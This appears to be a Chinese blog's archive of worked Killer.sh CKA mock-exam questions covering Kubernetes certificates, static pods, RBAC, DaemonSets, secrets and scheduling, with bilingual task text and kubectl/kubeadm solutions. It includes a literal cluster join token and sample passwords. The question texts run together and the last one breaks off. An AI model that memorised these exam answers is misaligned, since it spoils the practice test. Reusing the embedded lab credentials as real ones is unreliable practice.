参考: https://kubernetes.io/zh-cn/docs/reference/command-line-tools-reference/kubelet/

kubectl config use-context k8s-c2-AC

远程到cluster2-node1节点,使用openssl进行查看

ssh cluster2-node1
#client证书
root@cluster2-node1:~# openssl x509  -noout -text -in /var/lib/kubelet/pki/kubelet-client-current.pem | grep Issuer
root@cluster2-node1:~# openssl x509  -noout -text -in /var/lib/kubelet/pki/kubelet-client-current.pem | grep "Extended Key Usage" -A1

#server证书
root@cluster2-node1:~# openssl x509  -noout -text -in /var/lib/kubelet/pki/kubelet.crt | grep Issuer
root@cluster2-node1:~# openssl x509  -noout -text -in /var/lib/kubelet/pki/kubelet.crt | grep "Extended Key Usage" -A1

cluster-cert-info-0

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Question 22 | Check how long certificates are valid /archives/kubernetes/CKA/check-cert.html Task weight: 2%

Use context: kubectl config use-context k8s-c2-AC

Check how long the kube-apiserver server certificate is valid on cluster2-controlplane1 . Do this with openssl or cfssl. Write the exipiration date into /opt/course/22/expiration .

Also run the correct kubeadm command to list the expiration dates and confirm both methods show the same date.

Write the correct kubeadm command that would renew the apiserver server certificate into /opt/course/22/kubeadm-renew-certs.sh .

译文

在 cluster2-controlplane1 上检查 kube-apiserver 服务器证书的有效期。使用 openssl 或 cfssl 执行此操作。将过期日期写入 /opt/course/22/expiration 中。

同时运行正确的 kubeadm 命令列出过期日期，并确认两种方法显示的日期相同。

将更新apiserver服务器证书正确 kubeadm命令写入 /opt/course/22/kubeadm-renew-certs.sh 中。

解答

kubectl config use-context k8s-c2-AC

连接到controlplane1,并检查证书过期时间

ssh cluster2-controlplane1

root@cluster2-controlplane1:~# find /etc/kubernetes/pki | grep apiserver
root@cluster2-controlplane1:~# openssl x509  -noout -text -in /etc/kubernetes/pki/apiserver.crt | grep Validity -A2

check-cert-0

使用kubeadm 来获取过期时间

root@cluster2-controlplane1:~# kubeadm certs check-expiration | grep apiserver

check-cert-1

写过期时间到文件

echo "Jan 10 05:00:49 2024 GMT" > /opt/course/22/expiration

更新证书

echo "kubeadm certs renew apiserver" > /opt/course/22/kubeadm-renew-certs.sh

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Question 21 | Create a Static Pod and Service /archives/kubernetes/CKA/create-pod-svc.html Use context: kubectl config use-context k8s-c3-CCC

Create a Static Pod named my-static-pod in Namespace default on cluster3-controlplane1 . It should be of image nginx:1.16-alpine and have resource requests for 10m CPU and 20Mi memory.

Then create a NodePort Service named static-pod-service which exposes that static Pod on port 80 and check if it has Endpoints and if it’s reachable through the cluster3-controlplane1 internal IP address. You can connect to the internal node IPs from your main terminal.

译文

在 cluster3-controlplane1 的名称空间 default 中创建一个名为 my-static-pod 的静态 Pod。镜像为 nginx:1.16-alpine ，并有 10m CPU 和 20Mi 内存的资源请求

然后创建一个名为 static-pod-service 的 NodePort 服务，通过 80 端口公开该静态 Pod，并检查它是否有端点，以及是否可以通过 cluster3-controlplane1 内部 IP 地址访问。您可以从主终端连接到内部节点 IP 地址

解答

kubectl config use-context k8s-c3-CCC

连接到cluster3-controlplane1 并新建一个pod

ssh cluster3-controlplane1

root@cluster1-controlplane1:~# cd /etc/kubernetes/manifests/

root@cluster1-controlplane1:~# kubectl run my-static-pod \
    --image=nginx:1.16-alpine \
    -o yaml --dry-run=client > my-static-pod.yaml

my-static-pod.yaml

# /etc/kubernetes/manifests/my-static-pod.yaml
apiVersion: v1
kind: Pod
metadata:
  creationTimestamp: null
  labels:
    run: my-static-pod
  name: my-static-pod
spec:
  containers:
  - image: nginx:1.16-alpine
    name: my-static-pod
    resources:                     #change
      requests:                    #add
        cpu: 10m                   #add
        memory: 20Mi               #add
  dnsPolicy: ClusterFirst
  restartPolicy: Always
status: {}

返回操作节点,检查pod

k get pod -A | grep my-static

create-pod-svc-0

暴露端口

k expose pod my-static-pod-cluster3-controlplane1 \
  --name static-pod-service \
  --type=NodePort \
  --port 80

检查

k get svc,ep -l run=my-static-pod

create-pod-svc-1

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Question 20 | Update Kubernetes Version and join cluster /archives/kubernetes/CKA/cluster-update-2.html Use context: kubectl config use-context k8s-c3-CCC

Your coworker said node cluster3-node2 is running an older Kubernetes version and is not even part of the cluster. Update Kubernetes on that node to the exact version that’s running on cluster3-controlplane1 . Then add this node to the cluster. Use kubeadm for this.

译文

你的同事说 cluster3-node2 节点运行的是旧的Kubernetes版本，甚至不是集群的一部分。将该节点上的Kubernetes版本更新为 cluster3-controlplane1 上运行的版本。使用kubeadm把这个节点添加到集群中。2023-01-10 15:33

kubectl config use-context k8s-c3-CCC

检查节点

k get node

连接到远程node2,检查kubeadm, kubelet,kubectl 情况

ssh cluster3-node2
root@cluster3-node2:~# kubeadm version
root@cluster3-node2:~# kubectl version --short
root@cluster3-node2:~# kubelet --version

更新 kubelet,kubectl到1.26.0-00

root@cluster3-node2:~# apt update
root@cluster3-node2:~# apt show kubectl -a | grep 1.26
root@cluster3-node2:~# apt install -y kubectl=1.26.0-00 kubelet=1.26.0-00
root@cluster3-node2:~# kubelet --version
root@cluster3-node2:~# systemctl daemon-reload
root@cluster3-node2:~# systemctl restart kubelet

从控制平面获取join 集群命令链接

ssh cluster3-controlplane1
root@cluster3-controlplane1:~# kubeadm token create --print-join-command

cluster-update-2-0

进入node2节点,把从控制平面获取的join token 执行

ssh cluster3-node2

root@cluster3-node2:~# kubeadm join 192.168.100.31:6443 --token rbhrjh.4o93r31o18an6dll --discovery-token-ca-cert-hash sha256:d94524f9ab1eed84417414c7def5c1608f84dbf04437d9f5f73eb6255dafdb18

cluster-update-2-1

检查kubelet 状态

systemctl status kubelet

检查集群node

k get node

cluster-update-2-2

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Question 19 | Create Secret and mount into Pod /archives/kubernetes/CKA/create-secret.html Task weight: 3%

NOTE: This task can only be solved if questions 18 or 20 have been successfully implemented and the k8s-c3-CCC cluster has a functioning worker node

Use context: kubectl config use-context k8s-c3-CCC

Do the following in a new Namespace secret . Create a Pod named secret-pod of image busybox:1.31.1 which should keep running for some time.

There is an existing Secret located at /opt/course/19/secret1.yaml , create it in the Namespace secret and mount it readonly into the Pod at /tmp/secret1 .

Create a new Secret in Namespace secret called secret2 which should contain user=user1 and pass=1234 . These entries should be available inside the Pod’s container as environment variables APP_USER and APP_PASS .

Confirm everything is working.

译文

注意：只有当问题18或20已经成功实施，并且k8s-c3-CCC集群有一个正常工作的工作节点时，才能解决这个任务

在一个新的命名空间 secret 中进行以下操作。创建一个名为 secret-pod 的Pod，其镜像为 busybox:1.31.1 ，应该保持运行一段时间。

有一个位于 /opt/course/19/secret1.yaml 的现有Secret ，在命名空间 secret 中创建它，并将其以只读方式装载到 /tmp/secret1 的Pod中。

在命名空间 secret 中创建一个新的 secret ，称为 secret2 ，它应该包含user=user1 和 pass=1234 。这些条目应该在Pod的容器中作为环境变量 APP_USER 和 APP_PASS 可用。

确认一切都在工作。

解答

kubectl config use-context k8s-c3-CCC

创建一个secret,并复制文件到当前目录进行编辑

k create ns secret
cp /opt/course/19/secret1.yaml 19_secret1.yaml

vim 19_secret1.yaml

19_secret1.yaml

# 19_secret1.yaml
apiVersion: v1
data:
  halt: IyEgL2Jpbi9zaAo...
kind: Secret
metadata:
  creationTimestamp: null
  name: secret1
  namespace: secret           # change

创建secret

k -f 19_secret1.yaml create

创建第二个secret

k -n secret create secret generic secret2 --from-literal=user=user1 --from-literal=pass=1234

创建一个pod模板并进行编辑

k -n secret run secret-pod --image=busybox:1.31.1 $do -- sh -c "sleep 1d" > 19.yaml

vim 19.yaml

19.yaml

# 19.yaml
apiVersion: v1
kind: Pod
metadata:
  creationTimestamp: null
  labels:
    run: secret-pod
  name: secret-pod
  namespace: secret                       # add
spec:
  containers:
  - args:
    - sh
    - -c
    - sleep 1d
    image: busybox:1.31.1
    name: secret-pod
    resources: {}
    env:                                  # add
    - name: APP_USER                      # add
      valueFrom:                          # add
        secretKeyRef:                     # add
          name: secret2                   # add
          key: user                       # add
    - name: APP_PASS                      # add
      valueFrom:                          # add
        secretKeyRef:                     # add
          name: secret2                   # add
          key: pass                       # add
    volumeMounts:                         # add
    - name: secret1                       # add
      mountPath: /tmp/secret1             # add
      readOnly: true                      # add
  dnsPolicy: ClusterFirst
  restartPolicy: Always
  volumes:                                # add
  - name: secret1                         # add
    secret:                               # add
      secretName: secret1                 # add
status: {}

创建pod

k -f 19.yaml create

检查

k -n secret exec secret-pod -- env | grep APP
k -n secret exec secret-pod -- find /tmp/secret1
k -n secret exec secret-pod -- cat /tmp/secret1/halt

create-secret-0

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Question 18 | Fix Kubelet /archives/kubernetes/CKA/fix-kubelet.html Use context: kubectl config use-context k8s-c3-CCC

There seems to be an issue with the kubelet not running on cluster3-node1 . Fix it and confirm that cluster has node cluster3-node1 available in Ready state afterwards. You should be able to schedule a Pod on cluster3-node1 afterwards.

Write the reason of the issue into /opt/course/18/reason.txt .

译文

在 cluster3-node1 上运行的 kubelet 似乎有问题。修复该问题并确认集群中的 cluster3-node1 节点处于就绪状态。之后，您应该可以在 cluster3-node1 上调度 Pod。

将问题原因写入 /opt/course/18/reason.txt 。

解答

kubectl config use-context k8s-c3-CCC

查看节点并远程连接到节点

k get node
ssh cluster3-node1

检查 kubelet 服务

root@cluster3-node1:~# systemctl status kubelet

fix-kubelet-0

启动服务并检查状态

root@cluster3-node1:~# systemctl enable kubelet --now
root@cluster3-node1:~# systemctl status kubelet

无法启动, 查看详细错误,发现是路径不对,检查服务配置文件, 并获取kubelet真实路径

journalctl -xe

fix-kubelet-1
fix-kubelet-2

修改配置文件

vim /etc/systemd/system/kubelet.service.d/10-kubeadm.conf

fix-kubelet-3

修改文件后,重载配置并启动服务

systemctl daemon-reload && systemctl restart kubelet
systemctl status kubelet

fix-kubelet-4

原因

echo "wrong path to kubelet binary specified in service config" > /opt/course/18/reason.txt

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Question 17 | Find Container of Pod and check info /archives/kubernetes/CKA/find-container-id.html Use context: kubectl config use-context k8s-c1-H

In Namespace project-tiger create a Pod named tigers-reunite of image httpd:2.4.41-alpine with labels pod=container and container=pod . Find out on which node the Pod is scheduled. Ssh into that node and find the containerd container belonging to that Pod.

Using command crictl :

Write the ID of the container and the info.runtimeType into /opt/course/17/pod-container.txt Write the logs of the container into /opt/course/17/pod-container.log

译文

在名称空间 project-tiger 中，创建一个名为 tigers-reunite 的Pod，镜像为 httpd:2.4.41-alpine ，标签为 pod=container ，container=pod 。找出Pod被安排在哪个节点上。Ssh进入该节点，找到属于该Pod的containerd容器。

使用 crictl 命令。

将容器的ID 和 info.runtimeType 写入 /opt/course/17/pod-container.txt 中。将容器的日志写入 /opt/course/17/pod-container.log

解答

bash

kubectl config use-context k8s-c1-H

创建pod

k -n project-tiger run tigers-reunite \
  --image=httpd:2.4.41-alpine \
  --labels="pod=container,container=pod"

查看pod所在节点

bash

k -n project-tiger get pod tigers-reunite -o wide

find-container-id-0

远程连接node

ssh cluster1-node2
root@cluster1-node2:~# crictl ps | grep tigers-reunite
root@cluster1-node2:~# crictl inspect b01edbe6f89ed | grep runtimeType
root@cluster1-node2:~# exit

find-container-id-1

写内容到文件

echo "6253a89688d7d io.containerd.runc.v2" > /opt/course/17/pod-container.txt

ssh cluster1-node2 'crictl logs 6253a89688d7d' &> /opt/course/17/pod-container.log

find-container-id-2

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Question 16 | Namespaces and Api Resources /archives/kubernetes/CKA/resources.html Use context: kubectl config use-context k8s-c1-H

Write the names of all namespaced Kubernetes resources (like Pod, Secret, ConfigMap…) into /opt/course/16/resources.txt .

Find the project-* Namespace with the highest number of Roles defined in it and write its name and amount of Roles into /opt/course/16/crowded-namespace.txt .

译文

将所有命名的 Kubernetes 资源（如 Pod、Secret、ConfigMap……）的名称写入 /opt/course/16/resources.txt 中。

查找定义角色数量最多的 *project-*** 命名空间，并将其名称和角色数量写入 /opt/course/16/crowded-namespace.txt 中。

解答

bash

kubectl config use-context k8s-c1-H

将被命名的资源写入文件

bash

k api-resources --namespaced -o name > /opt/course/16/resources.txt

resources-0

file

检查命名空间中角色数量通过脚本循环检查

bash

for i in `k get ns -o name | cut -d / -f 2` ; do echo $i ; k -n $i get role --no-headers | wc -l; done

resources-1

file

vim /opt/course/16/crowded-namespace.txt

yaml

project-c14 with 300 resources

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Question 15 | Cluster Event Logging /archives/kubernetes/CKA/cluster-logs.html

Use context: kubectl config use-context k8s-c2-AC

Write a command into /opt/course/15/cluster_events.sh which shows the latest events in the whole cluster, ordered by time ( metadata.creationTimestamp ). Use kubectl for it.

Now kill the kube-proxy Pod running on node cluster2-node1 and write the events this caused into /opt/course/15/pod_kill.log .

Finally kill the containerd container of the kube-proxy Pod on node cluster2-node1 and write the events into /opt/course/15/container_kill.log .

Do you notice differences in the events both actions caused?

译文

在 /opt/course/15/cluster_events.sh 中写一条命令，显示整个集群的最新事件，按时间（ metadata.creationTimestamp ）排序。使用 kubectl 来实现。

现在，杀死运行在 cluster2-node1 节点上的 kube-proxy Pod，并将其引起的事件写入 /opt/course/15/pod_kill.log 中。

最后，杀死 cluster2-node1 节点上的 kube-proxy Pod的 containerd 容器，并将事件写入 /opt/course/15/container_kill.log 中。

你是否注意到这两个动作引起的事件的不同？

解答

kubectl config use-context k8s-c2-AC

sh 脚本

echo "kubectl get events -A --sort-by=.metadata.creationTimestamp" > /opt/course/15/cluster_events.sh

查找proxy pod ,并kill node1上面的pod,然后检查日志

k -n kube-system get pod -o wide | grep proxy
k -n kube-system delete pod kube-proxy-
sh /opt/course/15/cluster_events.sh > /opt/course/15/pod_kill.log

cluster-logs-0

连接到node1并结束掉proxy 容器

ssh cluster2-node1
root@cluster2-node1:~# crictl ps | grep kube-proxy
root@cluster2-node1:~# crictl stop 254ceb6e415ac
root@cluster2-node1:~# crictl ps | grep kube-proxy

cluster-logs-1

写日志

sh /opt/course/15/cluster_events.sh > /opt/course/15/container_kill.log

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Question 14 | Find out Cluster Information /archives/kubernetes/CKA/cluster-info.html Use context: kubectl config use-context k8s-c1-H

You’re ask to find out following information about the cluster k8s-c1-H :

How many controlplane nodes are available? How many worker nodes are available? What is the Service CIDR? Which Networking (or CNI Plugin) is configured and where is its config file? Which suffix will static pods have that run on cluster1-node1? Write your answers into file /opt/course/14/cluster-info , structured like this:

# /opt/course/14/cluster-info
1: [ANSWER]
2: [ANSWER]
3: [ANSWER]
4: [ANSWER]
5: [ANSWER]

译文

你被要求找出关于集群 k8s-c1-H 的以下信息。

有多少个控制板节点可用？
有多少个工作节点可用？
服务的CIDR是什么？
哪个网络（或CNI插件）被配置了，其配置文件在哪里？
运行在cluster1-node1上的静态pod会有哪个后缀？

把你的答案写进文件 /opt/course/14/cluster-info ，结构如下。

# /opt/course/14/cluster-info
1: [答案]
2: [答案]
3: [答案]
4: [答案]
5: [答案]

解答

kubectl config use-context k8s-c1-H

检查节点和控制节点可用数量

k get node
k desribe node | grep -i taints

查看集群CIDR 及CNI 插件位置

ssh cluster1-controlplane1
root@cluster1-controlplane1:~# cat /etc/kubernetes/manifests/kube-apiserver.yaml | grep range
root@cluster1-controlplane1:~# find /etc/cni/net.d/
root@cluster1-controlplane1:~# cat /etc/cni/net.d/10-weave.conflist

cluster-info-0

vim /opt/course/14/cluster-info

# /opt/course/14/cluster-info
1: 1
2: 2
3: 10.96.0.0/12
4: Weave, /etc/cni/net.d/10-weave.conflist
5: -cluster1-node1

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Question 13 | Multi Containers and Pod shared Volume /archives/kubernetes/CKA/emptyDir.html Task weight: 4%

Use context: kubectl config use-context k8s-c1-H

Create a Pod named multi-container-playground in Namespace default with three containers, named c1 , c2 and c3 . There should be a volume attached to that Pod and mounted into every container, but the volume shouldn’t be persisted or shared with other Pods.

Container c1 should be of image nginx:1.17.6-alpine and have the name of the node where its Pod is running available as environment variable MY_NODE_NAME.

Container c2 should be of image busybox:1.31.1 and write the output of the date command every second in the shared volume into file date.log . You can use while true; do date >> /your/vol/path/date.log; sleep 1; done for this.

Container c3 should be of image busybox:1.31.1 and constantly send the content of file date.log from the shared volume to stdout. You can use tail -f /your/vol/path/date.log for this.

Check the logs of container c3 to confirm correct setup.

译文

在Namespace default中创建一个名为 multi-container-playground 的Pod，有三个容器，分别名为 c1 、c2 和 c3 。应该有一个卷连接到该Pod并挂载到每个容器中，但该卷不应该被持久化或与其他Pod共享。

容器 c1 应该是 nginx:1.17.6-alpine 镜像，并且其Pod运行的节点名称可以作为环境变量 MY_NODE_NAME 。

容器 c2 应该是 busybox:1.31.1 镜像，并在共享卷中每秒钟将 date 命令的输出写入文件 date.log 中。你可以使用 while true; do date >> /your/vol/path/date.log; sleep 1; done 来实现这一点。

容器 c3 应该是 busybox:1.31.1 镜像，并不断地从共享卷中发送 date.log 文件的内容到stdout。你可以使用 tail -f /your/vol/path/date.log 来实现。

检查容器 c3 的日志以确认正确的设置。

解答

kubectl config use-context k8s-c1-H

创建一个pod模板

k run multi-container-playground --image=nginx:1.17.6-alpine $do > 13.yaml

vim 13.yaml

13.yaml

# 13.yaml
apiVersion: v1
kind: Pod
metadata:
  creationTimestamp: null
  labels:
    run: multi-container-playground
  name: multi-container-playground
spec:
  containers:
  - image: nginx:1.17.6-alpine
    name: c1                                                                      # change
    resources: {}
    env:                                                                          # add
    - name: MY_NODE_NAME                                                          # add
      valueFrom:                                                                  # add
        fieldRef:                                                                 # add
          fieldPath: spec.nodeName                                                # add
    volumeMounts:                                                                 # add
    - name: vol                                                                   # add
      mountPath: /vol                                                             # add
  - image: busybox:1.31.1                                                         # add
    name: c2                                                                      # add
    command: ["sh", "-c", "while true; do date >> /vol/date.log; sleep 1; done"]  # add
    volumeMounts:                                                                 # add
    - name: vol                                                                   # add
      mountPath: /vol                                                             # add
  - image: busybox:1.31.1                                                         # add
    name: c3                                                                      # add
    command: ["sh", "-c", "tail -f /vol/date.log"]                                # add
    volumeMounts:                                                                 # add
    - name: vol                                                                   # add
      mountPath: /vol                                                             # add
  dnsPolicy: ClusterFirst
  restartPolicy: Always
  volumes:                                                                        # add
    - name: vol                                                                   # add
      emptyDir: {}                                                                # add
status: {}

创建pod

k -f 13.yaml create

检查验证C1 env , c3 logs

k get pod multi-container-playground
k exec multi-container-playground -c c1 -- env | grep MY
k logs multi-container-playground -c c3

emptyDir-0

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Question 12 | Deployment on all Nodes /archives/kubernetes/CKA/Deployment-2.html Use context: kubectl config use-context k8s-c1-H

Use Namespace project-tiger for the following. Create a Deployment named deploy-important with label id=very-important (the Pods should also have this label) and 3 replicas. It should contain two containers, the first named container1 with image nginx:1.17.6-alpine and the second one named container2 with image kubernetes/pause .

There should be only ever one Pod of that Deployment running on one worker node. We have two worker nodes: cluster1-node1 and cluster1-node2 . Because the Deployment has three replicas the result should be that on both nodes one Pod is running. The third Pod won’t be scheduled, unless a new worker node will be added.

In a way we kind of simulate the behaviour of a DaemonSet here, but using a Deployment and a fixed number of replicas.

译文

使用命名空间 project-tiger 进行以下工作。

创建一个名为deploy-important 的部署，标签 id=very-important （Pod也应该有这个标签）和3个副本。

它应该包含两个容器，第一个名为container1 ，镜像为 nginx:1.17.6-alpine ，第二个名为 container2 ，镜像为 kubernetes/pause 。

在一个工作节点上应该只有 一个 部署的Pod在运行。我们有两个工作节点： cluster1-node1 和 cluster1-node2 。
因为该部署有三个副本，结果应该是两个节点上都有一个Pod在运行。第三个Pod不会被安排，除非有一个新的工作节点被添加。

在某种程度上，我们在这里模拟了DaemonSet的行为，但使用了一个部署和固定数量的副本

解答

有两种方式，一种使用 podAntiAffinity ，一种使用 topologySpreadConstraint

PodAntiAffinity

k -n project-tiger create deployment \
--image=nginx:1.17.6-alpine deploy-important $do > 12.yaml

vim 12.yaml

12.vim

# 12.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  creationTimestamp: null
  labels:
    id: very-important                  # change
  name: deploy-important
  namespace: project-tiger              # important
spec:
  replicas: 3                           # change
  selector:
    matchLabels:
      id: very-important                # change
  strategy: {}
  template:
    metadata:
      creationTimestamp: null
      labels:
        id: very-important              # change
    spec:
      containers:
      - image: nginx:1.17.6-alpine
        name: container1                # change
        resources: {}
      - image: kubernetes/pause         # add
        name: container2                # add
      affinity:                                             # add
        podAntiAffinity:                                    # add
          requiredDuringSchedulingIgnoredDuringExecution:   # add
          - labelSelector:                                  # add
              matchExpressions:                             # add
              - key: id                                     # add
                operator: In                                # add
                values:                                     # add
                - very-important                            # add
            topologyKey: kubernetes.io/hostname             # add
status: {}

TopologySpreadConstraints

# 12.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  creationTimestamp: null
  labels:
    id: very-important                  # change
  name: deploy-important
  namespace: project-tiger              # important
spec:
  replicas: 3                           # change
  selector:
    matchLabels:
      id: very-important                # change
  strategy: {}
  template:
    metadata:
      creationTimestamp: null
      labels:
        id: very-important              # change
    spec:
      containers:
      - image: nginx:1.17.6-alpine
        name: container1                # change
        resources: {}
      - image: kubernetes/pause         # add
        name: container2                # add
      topologySpreadConstraints:                 # add
      - maxSkew: 1                               # add
        topologyKey: kubernetes.io/hostname      # add
        whenUnsatisfiable: DoNotSchedule         # add
        labelSelector:                           # add
          matchLabels:                           # add
            id: very-important                   # add
status: {}

创建对应的deployment

k -f 12.yaml create

我们检查部署状态，它显示2/3的准备数量。其中有一个没有被调度

k -n project-tiger get deploy -l id=very-important
k -n project-tiger get pod -o wide -l id=very-important

Deployment-2-0

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Question 11 | DaemonSet on all Nodes /archives/kubernetes/CKA/DaemonSet.html

Use context: kubectl config use-context k8s-c1-H

Use Namespace project-tiger for the following. Create a DaemonSet named ds-important with image httpd:2.4-alpine and labels id=ds-important and uuid=18426a0b-5f59-4e10-923f-c0e078e82462 . The Pods it creates should request 10 millicore cpu and 10 mebibyte memory. The Pods of that DaemonSet should run on all nodes, also controlplanes.

译文

在命名空间 project-tiger 进行如下操作。创建一个名为 ds-important 的 DaemonSet ，镜像为 httpd:2.4-alpine ，标签 id=ds-important ， uuid=18426a0b-5f59-4e10-923f-c0e078e82462 。它所创建的Pod应该要求 10个毫核cpu 和 10个mebibyte内存。该 DaemonSet 的 Pod 应该在所有的节点上运行，包括控制平面。

解答

通过创建 deployment 来创建 daemonset

k -n project-tiger create deployment --image=httpd:2.4-alpine ds-important $do > 11.yaml

vim 11.yaml

11.yaml

# 11.yaml
apiVersion: apps/v1
kind: DaemonSet                                     # change from Deployment to Daemonset
metadata:
  creationTimestamp: null
  labels:                                           # add
    id: ds-important                                # add
    uuid: 18426a0b-5f59-4e10-923f-c0e078e82462      # add
  name: ds-important
  namespace: project-tiger                          # important
spec:
  #replicas: 1                                      # remove
  selector:
    matchLabels:
      id: ds-important                              # add
      uuid: 18426a0b-5f59-4e10-923f-c0e078e82462    # add
  #strategy: {}                                     # remove
  template:
    metadata:
      creationTimestamp: null
      labels:
        id: ds-important                            # add
        uuid: 18426a0b-5f59-4e10-923f-c0e078e82462  # add
    spec:
      containers:
      - image: httpd:2.4-alpine
        name: ds-important
        resources:
          requests:                                 # add
            cpu: 10m                                # add
            memory: 10Mi                            # add
      tolerations:                                  # add
      - effect: NoSchedule                          # add
        key: node-role.kubernetes.io/control-plane  # add
#status: {}                                         # remove

应用文件创建pod,并检查状态

k -f 11.yaml create
k -n project-tiger get ds
k -n project-tiger get pod -l id=ds-important -o wide

DaemonSet-0

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Question 10 | RBAC ServiceAccount Role RoleBinding /archives/kubernetes/CKA/rbac-2.html

Use context: kubectl config use-context k8s-c1-H

Create a new ServiceAccount processor in Namespace project-hamster . Create a Role and RoleBinding, both named processor as well. These should allow the new SA to only create Secrets and ConfigMaps in that Namespace.

译文

在namespace project-hamster 中创建一个新的 ServiceAccount processor 。创建一个角色和 RoleBinding ，这两个都是命名的 processor 。这些应该允许新的 SA 只在该命名空间中创建 Secrets 和 ConfigMaps 。

解答

有4种不同的RBAC组合和3种有效的组合。

Role + RoleBinding（适用于单一命名空间，适用于单个命名空间）
ClusterRole + ClusterRoleBinding (全集群可用，适用于整个集群)
ClusterRole + RoleBinding（全集群可用，适用于单个命名空间）
Role + ClusterRoleBinding（不可用：在单个命名空间中可用，适用于整个集群）

k config use-context k8s-c1-H

创建ServiceAccount,role

k -n project-hamster create sa processor
k -n project-hamster create role processor \
  --verb=create \
  --resource=secret \
  --resource=configmap

创建 rolebinding

k -n project-hamster create rolebinding processor \
  --role processor \
  --serviceaccount project-hamster:processor

验证

k -n project-hamster auth can-i create secret \
  --as system:serviceaccount:project-hamster:processor

k -n project-hamster auth can-i create configmap \
  --as system:serviceaccount:project-hamster:processor

k -n project-hamster auth can-i create pod \
  --as system:serviceaccount:project-hamster:processor

k -n project-hamster auth can-i delete secret \
  --as system:serviceaccount:project-hamster:processor

k -n project-hamster auth can-i get configmap \
  --as system:serviceaccount:project-hamster:processor

rbac-2-0

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Question 9 | Kill Scheduler, Manual Scheduling /archives/kubernetes/CKA/node-schedule-3.html

Use context: kubectl config use-context k8s-c2-AC

Ssh into the controlplane node with ssh cluster2-controlplane1 . Temporarily stop the kube-scheduler, this means in a way that you can start it again afterwards.

Create a single Pod named manual-schedule of image httpd:2.4-alpine , confirm it’s created but not scheduled on any node.

Now you’re the scheduler and have all its power, manually schedule that Pod on node cluster2-controlplane1. Make sure it’s running.

Start the kube-scheduler again and confirm it’s running correctly by creating a second Pod named manual-schedule2 of image httpd:2.4-alpine and check if it’s running on cluster2-node1.

译文

用 ssh cluster2-controlplane1 登录控制板节点。暂时停止 kube-scheduler ，这意味着你可以在之后再次启动它。

创建一个名为 manual-schedule 的 Pod，镜像为 httpd:2.4-alpine ，确认它已经创建，但没有在任何节点上调度。

现在你是调度员，拥有它的所有权力，在 cluster2-controlplane1 节点上手动调度这个 Pod 。确保它正在运行。

再次启动 kube-scheduler ，通过创建第二个Pod manual-schedule2 使用镜像 httpd:2.4-alpine ，并检查它是否在 cluster2-node1 上运行，确认它运行正常。

解答

kubectl config use-context k8s-c2-AC

检查并找出 controlplane 节点,

k get node

node-schedule-3-0

连接上远程节点并检查调度程序是否正在运行。

ssh cluster2-controlplane1
root@cluster2-controlplane1:~# kubectl -n kube-system get pod | grep schedule

node-schedule-3-1

通过移出yaml文件结束调度pod

root@cluster2-controlplane1:~# mv /etc/kubernetes/manifests/kube-scheduler.yaml .
root@cluster2-controlplane1:~# pwd
root@cluster2-controlplane1:~# kubectl -n kube-system get pod | grep schedule

node-schedule-3-2

创建pod,并检查状态

k run manual-schedule --image=httpd:2.4-alpine
k get pod manual-schedule -o wide

node-schedule-3-3

编辑pod

k get pod manual-schedule -o yaml > 9.yaml

9.yaml

# 9.yaml
apiVersion: v1
kind: Pod
metadata:
  creationTimestamp: "2020-09-04T15:51:02Z"
  labels:
    run: manual-schedule
  managedFields:
...
    manager: kubectl-run
    operation: Update
    time: "2020-09-04T15:51:02Z"
  name: manual-schedule
  namespace: default
  resourceVersion: "3515"
  selfLink: /api/v1/namespaces/default/pods/manual-schedule
  uid: 8e9d2532-4779-4e63-b5af-feb82c74a935
spec:
  nodeName: cluster2-controlplane1        # add the controlplane node name
  containers:
  - image: httpd:2.4-alpine
    imagePullPolicy: IfNotPresent
    name: manual-schedule
    resources: {}
    terminationMessagePath: /dev/termination-log
    terminationMessagePolicy: File
    volumeMounts:
    - mountPath: /var/run/secrets/kubernetes.io/serviceaccount
      name: default-token-nxnc7
      readOnly: true
  dnsPolicy: ClusterFirst
...

由于我们不能用kubectl应用或kubectl编辑，在这种情况下，我们需要删除并创建或替换

k -f 9.yaml replace --force
k get pod manual-schedule -o wide

node-schedule-3-4

再次调度

ssh cluster2-controlplane1
root@cluster2-controlplane1:~# mv kube-scheduler.yaml /etc/kubernetes/manifests/
root@cluster2-controlplane1:~# kubectl -n kube-system get pod | grep schedule
root@cluster2-controlplane1:~# exit

node-schedule-3-5

k run manual-schedule2 --image=httpd:2.4-alpine

node-schedule-3-6

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Question 8 | Get Controlplane Information /archives/kubernetes/CKA/Controplane-info.html Use context: kubectl config use-context k8s-c1-H

Ssh into the controlplane node with ssh cluster1-controlplane1 . Check how the controlplane components kubelet, kube-apiserver, kube-scheduler, kube-controller-manager and etcd are started/installed on the controlplane node. Also find out the name of the DNS application and how it’s started/installed on the controlplane node.

Write your findings into file /opt/course/8/controlplane-components.txt . The file should be structured like:

# /opt/course/8/controlplane-components.txt
kubelet: [TYPE]
kube-apiserver: [TYPE]
kube-scheduler: [TYPE]
kube-controller-manager: [TYPE]
etcd: [TYPE]
dns: [TYPE] [NAME]

Choices of TYPE are: not-installed, process, static-pod, pod

译文

用 ssh cluster1-controlplane1 登录控制板节点。检查控制板组件 kubelet 、kube-apiserver 、kube-scheduler 、kube-controller-manager 和 etcd 是如何在控制板节点上启动/安装的。还要找出 DNS应用程序 的名称以及它是如何在控制平面节点上启动/安装的。

